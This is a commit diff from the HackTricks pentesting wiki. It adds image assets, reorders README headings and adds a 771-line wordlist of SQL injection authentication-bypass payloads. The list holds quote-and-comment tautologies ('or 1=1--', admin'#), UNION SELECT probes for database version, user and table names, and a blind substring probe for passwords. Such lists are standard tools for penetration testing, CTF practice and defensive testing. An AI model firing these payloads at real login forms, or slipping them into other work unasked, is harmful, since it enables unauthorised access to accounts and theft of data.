GitBook: [#3143] No subject
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 72 KiB |
After Width: | Height: | Size: 93 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 13 KiB |
After Width: | Height: | Size: 766 KiB |
After Width: | Height: | Size: 766 KiB |
After Width: | Height: | Size: 766 KiB |
After Width: | Height: | Size: 142 KiB |
After Width: | Height: | Size: 142 KiB |
After Width: | Height: | Size: 142 KiB |
After Width: | Height: | Size: 142 KiB |
After Width: | Height: | Size: 142 KiB |
After Width: | Height: | Size: 142 KiB |
After Width: | Height: | Size: 142 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 10 KiB |
After Width: | Height: | Size: 10 KiB |
After Width: | Height: | Size: 10 KiB |
After Width: | Height: | Size: 10 KiB |
After Width: | Height: | Size: 10 KiB |
After Width: | Height: | Size: 10 KiB |
After Width: | Height: | Size: 10 KiB |
After Width: | Height: | Size: 10 KiB |
After Width: | Height: | Size: 1.3 MiB |
After Width: | Height: | Size: 1.3 MiB |
After Width: | Height: | Size: 1.3 MiB |
After Width: | Height: | Size: 1.3 MiB |
After Width: | Height: | Size: 1.3 MiB |
After Width: | Height: | Size: 1.3 MiB |
After Width: | Height: | Size: 1.3 MiB |
After Width: | Height: | Size: 1.3 MiB |
After Width: | Height: | Size: 740 KiB |
BIN
.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1).png
Normal file
After Width: | Height: | Size: 24 KiB |
BIN
.gitbook/assets/image (620) (1) (1) (1) (1) (1) (2).png
Normal file
After Width: | Height: | Size: 24 KiB |
BIN
.gitbook/assets/image (620) (2) (1).png
Normal file
After Width: | Height: | Size: 8.4 KiB |
BIN
.gitbook/assets/image (620) (2) (2).png
Normal file
After Width: | Height: | Size: 8.4 KiB |
BIN
.gitbook/assets/image (620) (2) (3).png
Normal file
After Width: | Height: | Size: 8.4 KiB |
BIN
.gitbook/assets/image (620) (2) (4).png
Normal file
After Width: | Height: | Size: 8.4 KiB |
BIN
.gitbook/assets/image (620) (2) (5).png
Normal file
After Width: | Height: | Size: 8.4 KiB |
BIN
.gitbook/assets/image (620) (2) (6).png
Normal file
After Width: | Height: | Size: 8.4 KiB |
BIN
.gitbook/assets/image (620) (2) (7).png
Normal file
After Width: | Height: | Size: 8.4 KiB |
BIN
.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1).png
Normal file
After Width: | Height: | Size: 137 KiB |
BIN
.gitbook/assets/image (638) (1) (1) (1) (1) (1) (2).png
Normal file
After Width: | Height: | Size: 137 KiB |
771
.gitbook/assets/sqli-authbypass-big (1) (1) (1) (1) (1).txt
Normal file
|
@ -0,0 +1,771 @@
|
|||
'-'
|
||||
' '
|
||||
'&'
|
||||
'^'
|
||||
'*'
|
||||
' or ''-'
|
||||
' or '' '
|
||||
' or ''&'
|
||||
' or ''^'
|
||||
' or ''*'
|
||||
"-"
|
||||
" "
|
||||
"&"
|
||||
"^"
|
||||
"*"
|
||||
" or ""-"
|
||||
" or "" "
|
||||
" or ""&"
|
||||
" or ""^"
|
||||
" or ""*"
|
||||
or true--
|
||||
" or true--
|
||||
' or true--
|
||||
") or true--
|
||||
') or true--
|
||||
' or 'x'='x
|
||||
') or ('x')=('x
|
||||
')) or (('x'))=(('x
|
||||
" or "x"="x
|
||||
") or ("x")=("x
|
||||
")) or (("x"))=(("x
|
||||
or 1=1
|
||||
or 1=1--
|
||||
or 1=1#
|
||||
or 1=1/*
|
||||
admin' --
|
||||
admin' #
|
||||
admin'/*
|
||||
admin' or '1'='1
|
||||
admin' or '1'='1'--
|
||||
admin' or '1'='1'#
|
||||
admin' or '1'='1'/*
|
||||
admin'or 1=1 or ''='
|
||||
admin' or 1=1
|
||||
admin' or 1=1--
|
||||
admin' or 1=1#
|
||||
admin' or 1=1/*
|
||||
admin') or ('1'='1
|
||||
admin') or ('1'='1'--
|
||||
admin') or ('1'='1'#
|
||||
admin') or ('1'='1'/*
|
||||
admin') or '1'='1
|
||||
admin') or '1'='1'--
|
||||
admin') or '1'='1'#
|
||||
admin') or '1'='1'/*
|
||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
||||
admin" --
|
||||
admin" #
|
||||
admin"/*
|
||||
admin" or "1"="1
|
||||
admin" or "1"="1"--
|
||||
admin" or "1"="1"#
|
||||
admin" or "1"="1"/*
|
||||
admin"or 1=1 or ""="
|
||||
admin" or 1=1
|
||||
admin" or 1=1--
|
||||
admin" or 1=1#
|
||||
admin" or 1=1/*
|
||||
admin") or ("1"="1
|
||||
admin") or ("1"="1"--
|
||||
admin") or ("1"="1"#
|
||||
admin") or ("1"="1"/*
|
||||
admin") or "1"="1
|
||||
admin") or "1"="1"--
|
||||
admin") or "1"="1"#
|
||||
admin") or "1"="1"/*
|
||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
||||
==
|
||||
=
|
||||
'
|
||||
' --
|
||||
' #
|
||||
' –
|
||||
'--
|
||||
'/*
|
||||
'#
|
||||
" --
|
||||
" #
|
||||
"/*
|
||||
' and 1='1
|
||||
' and a='a
|
||||
or 1=1
|
||||
or true
|
||||
' or ''='
|
||||
" or ""="
|
||||
1′) and '1′='1–
|
||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
||||
and 1=1
|
||||
and 1=1–
|
||||
' and 'one'='one
|
||||
' and 'one'='one–
|
||||
' group by password having 1=1--
|
||||
' group by userid having 1=1--
|
||||
' group by username having 1=1--
|
||||
like '%'
|
||||
or 0=0 --
|
||||
or 0=0 #
|
||||
or 0=0 –
|
||||
' or 0=0 #
|
||||
' or 0=0 --
|
||||
' or 0=0 #
|
||||
' or 0=0 –
|
||||
" or 0=0 --
|
||||
" or 0=0 #
|
||||
" or 0=0 –
|
||||
%' or '0'='0
|
||||
or 1=1
|
||||
or 1=1--
|
||||
or 1=1/*
|
||||
or 1=1#
|
||||
or 1=1–
|
||||
' or 1=1--
|
||||
' or '1'='1
|
||||
' or '1'='1'--
|
||||
' or '1'='1'/*
|
||||
' or '1'='1'#
|
||||
' or '1′='1
|
||||
' or 1=1
|
||||
' or 1=1 --
|
||||
' or 1=1 –
|
||||
' or 1=1--
|
||||
' or 1=1;#
|
||||
' or 1=1/*
|
||||
' or 1=1#
|
||||
' or 1=1–
|
||||
') or '1'='1
|
||||
') or '1'='1--
|
||||
') or '1'='1'--
|
||||
') or '1'='1'/*
|
||||
') or '1'='1'#
|
||||
') or ('1'='1
|
||||
') or ('1'='1--
|
||||
') or ('1'='1'--
|
||||
') or ('1'='1'/*
|
||||
') or ('1'='1'#
|
||||
'or'1=1
|
||||
'or'1=1′
|
||||
" or "1"="1
|
||||
" or "1"="1"--
|
||||
" or "1"="1"/*
|
||||
" or "1"="1"#
|
||||
" or 1=1
|
||||
" or 1=1 --
|
||||
" or 1=1 –
|
||||
" or 1=1--
|
||||
" or 1=1/*
|
||||
" or 1=1#
|
||||
" or 1=1–
|
||||
") or "1"="1
|
||||
") or "1"="1"--
|
||||
") or "1"="1"/*
|
||||
") or "1"="1"#
|
||||
") or ("1"="1
|
||||
") or ("1"="1"--
|
||||
") or ("1"="1"/*
|
||||
") or ("1"="1"#
|
||||
) or '1′='1–
|
||||
) or ('1′='1–
|
||||
' or 1=1 LIMIT 1;#
|
||||
'or 1=1 or ''='
|
||||
"or 1=1 or ""="
|
||||
' or 'a'='a
|
||||
' or a=a--
|
||||
' or a=a–
|
||||
') or ('a'='a
|
||||
" or "a"="a
|
||||
") or ("a"="a
|
||||
') or ('a'='a and hi") or ("a"="a
|
||||
' or 'one'='one
|
||||
' or 'one'='one–
|
||||
' or uid like '%
|
||||
' or uname like '%
|
||||
' or userid like '%
|
||||
' or user like '%
|
||||
' or username like '%
|
||||
' or 'x'='x
|
||||
') or ('x'='x
|
||||
" or "x"="x
|
||||
' OR 'x'='x'#;
|
||||
'=' 'or' and '=' 'or'
|
||||
' UNION ALL SELECT 1, @@version;#
|
||||
' UNION ALL SELECT system_user(),user();#
|
||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
||||
admin' and substring(password/text(),1,1)='7
|
||||
' and substring(password/text(),1,1)='7
|
||||
|
||||
==
|
||||
=
|
||||
'
|
||||
"
|
||||
'-- 2
|
||||
'/*
|
||||
'#
|
||||
"-- 2
|
||||
" #
|
||||
"/*
|
||||
'-'
|
||||
'&'
|
||||
'^'
|
||||
'*'
|
||||
'='
|
||||
0'<'2
|
||||
"-"
|
||||
"&"
|
||||
"^"
|
||||
"*"
|
||||
"="
|
||||
0"<"2
|
||||
|
||||
')
|
||||
")
|
||||
')-- 2
|
||||
')/*
|
||||
')#
|
||||
")-- 2
|
||||
") #
|
||||
")/*
|
||||
')-('
|
||||
')&('
|
||||
')^('
|
||||
')*('
|
||||
')=('
|
||||
0')<('2
|
||||
")-("
|
||||
")&("
|
||||
")^("
|
||||
")*("
|
||||
")=("
|
||||
0")<("2
|
||||
|
||||
'-''-- 2
|
||||
'-''#
|
||||
'-''/*
|
||||
'&''-- 2
|
||||
'&''#
|
||||
'&''/*
|
||||
'^''-- 2
|
||||
'^''#
|
||||
'^''/*
|
||||
'*''-- 2
|
||||
'*''#
|
||||
'*''/*
|
||||
'=''-- 2
|
||||
'=''#
|
||||
'=''/*
|
||||
0'<'2'-- 2
|
||||
0'<'2'#
|
||||
0'<'2'/*
|
||||
"-""-- 2
|
||||
"-""#
|
||||
"-""/*
|
||||
"&""-- 2
|
||||
"&""#
|
||||
"&""/*
|
||||
"^""-- 2
|
||||
"^""#
|
||||
"^""/*
|
||||
"*""-- 2
|
||||
"*""#
|
||||
"*""/*
|
||||
"=""-- 2
|
||||
"=""#
|
||||
"=""/*
|
||||
0"<"2"-- 2
|
||||
0"<"2"#
|
||||
0"<"2"/*
|
||||
|
||||
')-''-- 2
|
||||
')-''#
|
||||
')-''/*
|
||||
')&''-- 2
|
||||
')&''#
|
||||
')&''/*
|
||||
')^''-- 2
|
||||
')^''#
|
||||
')^''/*
|
||||
')*''-- 2
|
||||
')*''#
|
||||
')*''/*
|
||||
')=''-- 2
|
||||
')=''#
|
||||
')=''/*
|
||||
0')<'2'-- 2
|
||||
0')<'2'#
|
||||
0')<'2'/*
|
||||
")-""-- 2
|
||||
")-""#
|
||||
")-""/*
|
||||
")&""-- 2
|
||||
")&""#
|
||||
")&""/*
|
||||
")^""-- 2
|
||||
")^""#
|
||||
")^""/*
|
||||
")*""-- 2
|
||||
")*""#
|
||||
")*""/*
|
||||
")=""-- 2
|
||||
")=""#
|
||||
")=""/*
|
||||
0")<"2-- 2
|
||||
0")<"2#
|
||||
0")<"2/*
|
||||
|
||||
|
||||
'oR'2
|
||||
'oR'2'-- 2
|
||||
'oR'2'#
|
||||
'oR'2'/*
|
||||
'oR'2'oR'
|
||||
'oR(2)-- 2
|
||||
'oR(2)#
|
||||
'oR(2)/*
|
||||
'oR(2)oR'
|
||||
'oR 2-- 2
|
||||
'oR 2#
|
||||
'oR 2/*
|
||||
'oR 2 oR'
|
||||
'oR/**/2-- 2
|
||||
'oR/**/2#
|
||||
'oR/**/2/*
|
||||
'oR/**/2/**/oR'
|
||||
"oR"2
|
||||
"oR"2"-- 2
|
||||
"oR"2"#
|
||||
"oR"2"/*
|
||||
"oR"2"oR"
|
||||
"oR(2)-- 2
|
||||
"oR(2)#
|
||||
"oR(2)/*
|
||||
"oR(2)oR"
|
||||
"oR 2-- 2
|
||||
"oR 2#
|
||||
"oR 2/*
|
||||
"oR 2 oR"
|
||||
"oR/**/2-- 2
|
||||
"oR/**/2#
|
||||
"oR/**/2/*
|
||||
"oR/**/2/**/oR"
|
||||
|
||||
'oR'2'='2
|
||||
'oR'2'='2'oR'
|
||||
'oR'2'='2'-- 2
|
||||
'oR'2'='2'#
|
||||
'oR'2'='2'/*
|
||||
'oR'2'='2'oR'
|
||||
'oR 2=2-- 2
|
||||
'oR 2=2#
|
||||
'oR 2=2/*
|
||||
'oR 2=2 oR'
|
||||
'oR/**/2=2-- 2
|
||||
'oR/**/2=2#
|
||||
'oR/**/2=2/*
|
||||
'oR/**/2=2/**/oR'
|
||||
'oR(2)=2-- 2
|
||||
'oR(2)=2#
|
||||
'oR(2)=2/*
|
||||
'oR(2)=2/*
|
||||
'oR(2)=(2)oR'
|
||||
'oR'2'='2' LimIT 1-- 2
|
||||
'oR'2'='2' LimIT 1#
|
||||
'oR'2'='2' LimIT 1/*
|
||||
'oR(2)=(2)LimIT(1)-- 2
|
||||
'oR(2)=(2)LimIT(1)#
|
||||
'oR(2)=(2)LimIT(1)/*
|
||||
"oR"2"="2
|
||||
"oR"2"="2"oR"
|
||||
"oR"2"="2"-- 2
|
||||
"oR"2"="2"#
|
||||
"oR"2"="2"/*
|
||||
"oR"2"="2"oR"
|
||||
"oR 2=2-- 2
|
||||
"oR 2=2#
|
||||
"oR 2=2/*
|
||||
"oR 2=2 oR"
|
||||
"oR/**/2=2-- 2
|
||||
"oR/**/2=2#
|
||||
"oR/**/2=2/*
|
||||
"oR/**/2=2/**/oR"
|
||||
"oR(2)=2-- 2
|
||||
"oR(2)=2#
|
||||
"oR(2)=2/*
|
||||
"oR(2)=2/*
|
||||
"oR(2)=(2)oR"
|
||||
"oR"2"="2" LimIT 1-- 2
|
||||
"oR"2"="2" LimIT 1#
|
||||
"oR"2"="2" LimIT 1/*
|
||||
"oR(2)=(2)LimIT(1)-- 2
|
||||
"oR(2)=(2)LimIT(1)#
|
||||
"oR(2)=(2)LimIT(1)/*
|
||||
|
||||
'oR true-- 2
|
||||
'oR true#
|
||||
'oR true/*
|
||||
'oR true oR'
|
||||
'oR(true)-- 2
|
||||
'oR(true)#
|
||||
'oR(true)/*
|
||||
'oR(true)oR'
|
||||
'oR/**/true-- 2
|
||||
'oR/**/true#
|
||||
'oR/**/true/*
|
||||
'oR/**/true/**/oR'
|
||||
"oR true-- 2
|
||||
"oR true#
|
||||
"oR true/*
|
||||
"oR true oR"
|
||||
"oR(true)-- 2
|
||||
"oR(true)#
|
||||
"oR(true)/*
|
||||
"oR(true)oR"
|
||||
"oR/**/true-- 2
|
||||
"oR/**/true#
|
||||
"oR/**/true/*
|
||||
"oR/**/true/**/oR"
|
||||
|
||||
'oR'2'LiKE'2
|
||||
'oR'2'LiKE'2'-- 2
|
||||
'oR'2'LiKE'2'#
|
||||
'oR'2'LiKE'2'/*
|
||||
'oR'2'LiKE'2'oR'
|
||||
'oR(2)LiKE(2)-- 2
|
||||
'oR(2)LiKE(2)#
|
||||
'oR(2)LiKE(2)/*
|
||||
'oR(2)LiKE(2)oR'
|
||||
"oR"2"LiKE"2
|
||||
"oR"2"LiKE"2"-- 2
|
||||
"oR"2"LiKE"2"#
|
||||
"oR"2"LiKE"2"/*
|
||||
"oR"2"LiKE"2"oR"
|
||||
"oR(2)LiKE(2)-- 2
|
||||
"oR(2)LiKE(2)#
|
||||
"oR(2)LiKE(2)/*
|
||||
"oR(2)LiKE(2)oR"
|
||||
|
||||
admin
|
||||
admin'-- 2
|
||||
admin'#
|
||||
admin'/*
|
||||
admin"-- 2
|
||||
admin"#
|
||||
ffifdyop
|
||||
|
||||
' UniON SElecT 1,2-- 2
|
||||
' UniON SElecT 1,2,3-- 2
|
||||
' UniON SElecT 1,2,3,4-- 2
|
||||
' UniON SElecT 1,2,3,4,5-- 2
|
||||
' UniON SElecT 1,2#
|
||||
' UniON SElecT 1,2,3#
|
||||
' UniON SElecT 1,2,3,4#
|
||||
' UniON SElecT 1,2,3,4,5#
|
||||
'UniON(SElecT(1),2)-- 2
|
||||
'UniON(SElecT(1),2,3)-- 2
|
||||
'UniON(SElecT(1),2,3,4)-- 2
|
||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
||||
'UniON(SElecT(1),2)#
|
||||
'UniON(SElecT(1),2,3)#
|
||||
'UniON(SElecT(1),2,3,4)#
|
||||
'UniON(SElecT(1),2,3,4,5)#
|
||||
" UniON SElecT 1,2-- 2
|
||||
" UniON SElecT 1,2,3-- 2
|
||||
" UniON SElecT 1,2,3,4-- 2
|
||||
" UniON SElecT 1,2,3,4,5-- 2
|
||||
" UniON SElecT 1,2#
|
||||
" UniON SElecT 1,2,3#
|
||||
" UniON SElecT 1,2,3,4#
|
||||
" UniON SElecT 1,2,3,4,5#
|
||||
"UniON(SElecT(1),2)-- 2
|
||||
"UniON(SElecT(1),2,3)-- 2
|
||||
"UniON(SElecT(1),2,3,4)-- 2
|
||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
||||
"UniON(SElecT(1),2)#
|
||||
"UniON(SElecT(1),2,3)#
|
||||
"UniON(SElecT(1),2,3,4)#
|
||||
"UniON(SElecT(1),2,3,4,5)#
|
||||
|
||||
'||'2
|
||||
'||2-- 2
|
||||
'||'2'||'
|
||||
'||2#
|
||||
'||2/*
|
||||
'||2||'
|
||||
"||"2
|
||||
"||2-- 2
|
||||
"||"2"||"
|
||||
"||2#
|
||||
"||2/*
|
||||
"||2||"
|
||||
'||'2'='2
|
||||
'||'2'='2'||'
|
||||
'||2=2-- 2
|
||||
'||2=2#
|
||||
'||2=2/*
|
||||
'||2=2||'
|
||||
"||"2"="2
|
||||
"||"2"="2"||"
|
||||
"||2=2-- 2
|
||||
"||2=2#
|
||||
"||2=2/*
|
||||
"||2=2||"
|
||||
'||2=(2)LimIT(1)-- 2
|
||||
'||2=(2)LimIT(1)#
|
||||
'||2=(2)LimIT(1)/*
|
||||
"||2=(2)LimIT(1)-- 2
|
||||
"||2=(2)LimIT(1)#
|
||||
"||2=(2)LimIT(1)/*
|
||||
'||true-- 2
|
||||
'||true#
|
||||
'||true/*
|
||||
'||true||'
|
||||
"||true-- 2
|
||||
"||true#
|
||||
"||true/*
|
||||
"||true||"
|
||||
'||'2'LiKE'2
|
||||
'||'2'LiKE'2'-- 2
|
||||
'||'2'LiKE'2'#
|
||||
'||'2'LiKE'2'/*
|
||||
'||'2'LiKE'2'||'
|
||||
'||(2)LiKE(2)-- 2
|
||||
'||(2)LiKE(2)#
|
||||
'||(2)LiKE(2)/*
|
||||
'||(2)LiKE(2)||'
|
||||
"||"2"LiKE"2
|
||||
"||"2"LiKE"2"-- 2
|
||||
"||"2"LiKE"2"#
|
||||
"||"2"LiKE"2"/*
|
||||
"||"2"LiKE"2"||"
|
||||
"||(2)LiKE(2)-- 2
|
||||
"||(2)LiKE(2)#
|
||||
"||(2)LiKE(2)/*
|
||||
"||(2)LiKE(2)||"
|
||||
|
||||
')oR('2
|
||||
')oR'2'-- 2
|
||||
')oR'2'#
|
||||
')oR'2'/*
|
||||
')oR'2'oR('
|
||||
')oR(2)-- 2
|
||||
')oR(2)#
|
||||
')oR(2)/*
|
||||
')oR(2)oR('
|
||||
')oR 2-- 2
|
||||
')oR 2#
|
||||
')oR 2/*
|
||||
')oR 2 oR('
|
||||
')oR/**/2-- 2
|
||||
')oR/**/2#
|
||||
')oR/**/2/*
|
||||
')oR/**/2/**/oR('
|
||||
")oR("2
|
||||
")oR"2"-- 2
|
||||
")oR"2"#
|
||||
")oR"2"/*
|
||||
")oR"2"oR("
|
||||
")oR(2)-- 2
|
||||
")oR(2)#
|
||||
")oR(2)/*
|
||||
")oR(2)oR("
|
||||
")oR 2-- 2
|
||||
")oR 2#
|
||||
")oR 2/*
|
||||
")oR 2 oR("
|
||||
")oR/**/2-- 2
|
||||
")oR/**/2#
|
||||
")oR/**/2/*
|
||||
")oR/**/2/**/oR("
|
||||
')oR'2'=('2
|
||||
')oR'2'='2'oR('
|
||||
')oR'2'='2'-- 2
|
||||
')oR'2'='2'#
|
||||
')oR'2'='2'/*
|
||||
')oR'2'='2'oR('
|
||||
')oR 2=2-- 2
|
||||
')oR 2=2#
|
||||
')oR 2=2/*
|
||||
')oR 2=2 oR('
|
||||
')oR/**/2=2-- 2
|
||||
')oR/**/2=2#
|
||||
')oR/**/2=2/*
|
||||
')oR/**/2=2/**/oR('
|
||||
')oR(2)=2-- 2
|
||||
')oR(2)=2#
|
||||
')oR(2)=2/*
|
||||
')oR(2)=2/*
|
||||
')oR(2)=(2)oR('
|
||||
')oR'2'='2' LimIT 1-- 2
|
||||
')oR'2'='2' LimIT 1#
|
||||
')oR'2'='2' LimIT 1/*
|
||||
')oR(2)=(2)LimIT(1)-- 2
|
||||
')oR(2)=(2)LimIT(1)#
|
||||
')oR(2)=(2)LimIT(1)/*
|
||||
")oR"2"=("2
|
||||
")oR"2"="2"oR("
|
||||
")oR"2"="2"-- 2
|
||||
")oR"2"="2"#
|
||||
")oR"2"="2"/*
|
||||
")oR"2"="2"oR("
|
||||
")oR 2=2-- 2
|
||||
")oR 2=2#
|
||||
")oR 2=2/*
|
||||
")oR 2=2 oR("
|
||||
")oR/**/2=2-- 2
|
||||
")oR/**/2=2#
|
||||
")oR/**/2=2/*
|
||||
")oR/**/2=2/**/oR("
|
||||
")oR(2)=2-- 2
|
||||
")oR(2)=2#
|
||||
")oR(2)=2/*
|
||||
")oR(2)=2/*
|
||||
")oR(2)=(2)oR("
|
||||
")oR"2"="2" LimIT 1-- 2
|
||||
")oR"2"="2" LimIT 1#
|
||||
")oR"2"="2" LimIT 1/*
|
||||
")oR(2)=(2)LimIT(1)-- 2
|
||||
")oR(2)=(2)LimIT(1)#
|
||||
")oR(2)=(2)LimIT(1)/*
|
||||
')oR true-- 2
|
||||
')oR true#
|
||||
')oR true/*
|
||||
')oR true oR('
|
||||
')oR(true)-- 2
|
||||
')oR(true)#
|
||||
')oR(true)/*
|
||||
')oR(true)oR('
|
||||
')oR/**/true-- 2
|
||||
')oR/**/true#
|
||||
')oR/**/true/*
|
||||
')oR/**/true/**/oR('
|
||||
")oR true-- 2
|
||||
")oR true#
|
||||
")oR true/*
|
||||
")oR true oR("
|
||||
")oR(true)-- 2
|
||||
")oR(true)#
|
||||
")oR(true)/*
|
||||
")oR(true)oR("
|
||||
")oR/**/true-- 2
|
||||
")oR/**/true#
|
||||
")oR/**/true/*
|
||||
")oR/**/true/**/oR("
|
||||
')oR'2'LiKE('2
|
||||
')oR'2'LiKE'2'-- 2
|
||||
')oR'2'LiKE'2'#
|
||||
')oR'2'LiKE'2'/*
|
||||
')oR'2'LiKE'2'oR('
|
||||
')oR(2)LiKE(2)-- 2
|
||||
')oR(2)LiKE(2)#
|
||||
')oR(2)LiKE(2)/*
|
||||
')oR(2)LiKE(2)oR('
|
||||
")oR"2"LiKE("2
|
||||
")oR"2"LiKE"2"-- 2
|
||||
")oR"2"LiKE"2"#
|
||||
")oR"2"LiKE"2"/*
|
||||
")oR"2"LiKE"2"oR("
|
||||
")oR(2)LiKE(2)-- 2
|
||||
")oR(2)LiKE(2)#
|
||||
")oR(2)LiKE(2)/*
|
||||
")oR(2)LiKE(2)oR("
|
||||
admin')-- 2
|
||||
admin')#
|
||||
admin')/*
|
||||
admin")-- 2
|
||||
admin")#
|
||||
') UniON SElecT 1,2-- 2
|
||||
') UniON SElecT 1,2,3-- 2
|
||||
') UniON SElecT 1,2,3,4-- 2
|
||||
') UniON SElecT 1,2,3,4,5-- 2
|
||||
') UniON SElecT 1,2#
|
||||
') UniON SElecT 1,2,3#
|
||||
') UniON SElecT 1,2,3,4#
|
||||
') UniON SElecT 1,2,3,4,5#
|
||||
')UniON(SElecT(1),2)-- 2
|
||||
')UniON(SElecT(1),2,3)-- 2
|
||||
')UniON(SElecT(1),2,3,4)-- 2
|
||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
||||
')UniON(SElecT(1),2)#
|
||||
')UniON(SElecT(1),2,3)#
|
||||
')UniON(SElecT(1),2,3,4)#
|
||||
')UniON(SElecT(1),2,3,4,5)#
|
||||
") UniON SElecT 1,2-- 2
|
||||
") UniON SElecT 1,2,3-- 2
|
||||
") UniON SElecT 1,2,3,4-- 2
|
||||
") UniON SElecT 1,2,3,4,5-- 2
|
||||
") UniON SElecT 1,2#
|
||||
") UniON SElecT 1,2,3#
|
||||
") UniON SElecT 1,2,3,4#
|
||||
") UniON SElecT 1,2,3,4,5#
|
||||
")UniON(SElecT(1),2)-- 2
|
||||
")UniON(SElecT(1),2,3)-- 2
|
||||
")UniON(SElecT(1),2,3,4)-- 2
|
||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
||||
")UniON(SElecT(1),2)#
|
||||
")UniON(SElecT(1),2,3)#
|
||||
")UniON(SElecT(1),2,3,4)#
|
||||
")UniON(SElecT(1),2,3,4,5)#
|
||||
')||('2
|
||||
')||2-- 2
|
||||
')||'2'||('
|
||||
')||2#
|
||||
')||2/*
|
||||
')||2||('
|
||||
")||("2
|
||||
")||2-- 2
|
||||
")||"2"||("
|
||||
")||2#
|
||||
")||2/*
|
||||
")||2||("
|
||||
')||'2'=('2
|
||||
')||'2'='2'||('
|
||||
')||2=2-- 2
|
||||
')||2=2#
|
||||
')||2=2/*
|
||||
')||2=2||('
|
||||
")||"2"=("2
|
||||
")||"2"="2"||("
|
||||
")||2=2-- 2
|
||||
")||2=2#
|
||||
")||2=2/*
|
||||
")||2=2||("
|
||||
')||2=(2)LimIT(1)-- 2
|
||||
')||2=(2)LimIT(1)#
|
||||
')||2=(2)LimIT(1)/*
|
||||
")||2=(2)LimIT(1)-- 2
|
||||
")||2=(2)LimIT(1)#
|
||||
")||2=(2)LimIT(1)/*
|
||||
')||true-- 2
|
||||
')||true#
|
||||
')||true/*
|
||||
')||true||('
|
||||
")||true-- 2
|
||||
")||true#
|
||||
")||true/*
|
||||
")||true||("
|
||||
')||'2'LiKE('2
|
||||
')||'2'LiKE'2'-- 2
|
||||
')||'2'LiKE'2'#
|
||||
')||'2'LiKE'2'/*
|
||||
')||'2'LiKE'2'||('
|
||||
')||(2)LiKE(2)-- 2
|
||||
')||(2)LiKE(2)#
|
||||
')||(2)LiKE(2)/*
|
||||
')||(2)LiKE(2)||('
|
||||
")||"2"LiKE("2
|
||||
")||"2"LiKE"2"-- 2
|
||||
")||"2"LiKE"2"#
|
||||
")||"2"LiKE"2"/*
|
||||
")||"2"LiKE"2"||("
|
||||
")||(2)LiKE(2)-- 2
|
||||
")||(2)LiKE(2)#
|
||||
")||(2)LiKE(2)/*
|
||||
")||(2)LiKE(2)||("
|
||||
' UnION SELeCT 1,2`
|
||||
' UnION SELeCT 1,2,3`
|
||||
' UnION SELeCT 1,2,3,4`
|
||||
' UnION SELeCT 1,2,3,4,5`
|
||||
" UnION SELeCT 1,2`
|
||||
" UnION SELeCT 1,2,3`
|
||||
" UnION SELeCT 1,2,3,4`
|
||||
" UnION SELeCT 1,2,3,4,5`
|
34
README.md
|
@ -1,4 +1,10 @@
|
|||
---
|
||||
description: >-
|
||||
Welcome to the page where you will find each hacking trick/technique/whatever
|
||||
I have learnt in CTFs, real life apps, and reading researches and news.
|
||||
---
|
||||
|
||||
# HackTricks
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,14 +22,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
|
||||
---
|
||||
description: >-
|
||||
Welcome to the page where you will find each hacking trick/technique/whatever
|
||||
I have learnt in CTFs, real life apps, and reading researches and news.
|
||||
---
|
||||
|
||||
# HackTricks
|
||||
## HackTricks
|
||||
|
||||
![](.gitbook/assets/p.png)
|
||||
|
||||
|
@ -31,13 +30,13 @@ description: >-
|
|||
|
||||
Here you can find a little **introduction:**
|
||||
|
||||
## [**Pentesting Methodology**](pentesting-methodology.md)
|
||||
### [**Pentesting Methodology**](pentesting-methodology.md)
|
||||
|
||||
Here you will find the **typical flow** that **you should follow when pentesting** one or more **machines**.
|
||||
|
||||
**Click in the title to start!**
|
||||
|
||||
## Support HackTricks
|
||||
### Support HackTricks
|
||||
|
||||
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
|
@ -47,9 +46,9 @@ And if you are a PEASS & HackTricks enthusiast, you can get your hands now on ou
|
|||
